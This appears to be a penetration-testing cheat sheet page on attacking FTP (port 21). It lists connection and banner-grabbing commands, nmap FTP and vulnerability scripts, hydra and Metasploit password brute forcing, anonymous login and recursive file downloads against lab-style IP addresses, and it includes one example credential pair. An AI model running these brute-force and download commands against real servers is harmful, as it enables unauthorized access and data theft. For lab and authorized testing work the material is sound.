Port 21 - FTP

Connection

ftp 10.10.10.143
telnet 10.10.10.143 21
netcat 10.10.10.143 21

Banner Grabbing

telnet -vn 10.10.10.143

ftp 10.10.10.143
anonymous
anonymous

nmap ftp Script

nmap -oA nmap/ftp.nmap -script 'not brute and not dos and *ftp*' --script-args= -d -Pn -v -p 21 10.10.10.143
nmap ftp vuln script
nmap --script=ftp-* -p 21 10.10.10.143ome code

User Enumeration

// Some code

Username and Password Bruteforce Attack

# hydra
hydra -L ../cred/users.txt -P ../cred/passwords.txt -e nsr -s 21 -o "172.16.1.12.ftp.txt" ftp://172.16.1.12

# Metasploit
use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf auxiliary(ftp_login) > set USER_FILE users.txt
msf auxiliary(ftp_login) > set RHOSTS 10.10.10.143
msf auxiliary(ftp_login) > run

Download Files

ftp 10.10.10.143
PASSIVE
BINARY
get <FILE>
mget <FILEs>

Download Files Recursively

wget -r ftp://username:password@10.10.10.143/dir/*
wget -r ftp://10.10.10.143/dir/* --ftp-user=username --ftp-password=password
wget -r --user=anonymous --password="" ftp://10.10.10.143/dir/*
wget -r --user="steph" --password="billabong" ftp://10.1.1.68/

Sort files based on file size

find . -type f -exec du -h {} + | sort -h

Read all files

for file in $(find . -type f); do echo ">> $file <<"; cat $file; done

PreviousGitHub content access NextPort 22 - SSH

Last updated 2 years ago

Connection

Banner Grabbing

Anonymous Login

nmap ftp Script

User Enumeration

Username and Password Bruteforce Attack

Download Files

Download Files Recursively

Sort files based on file size

Read all files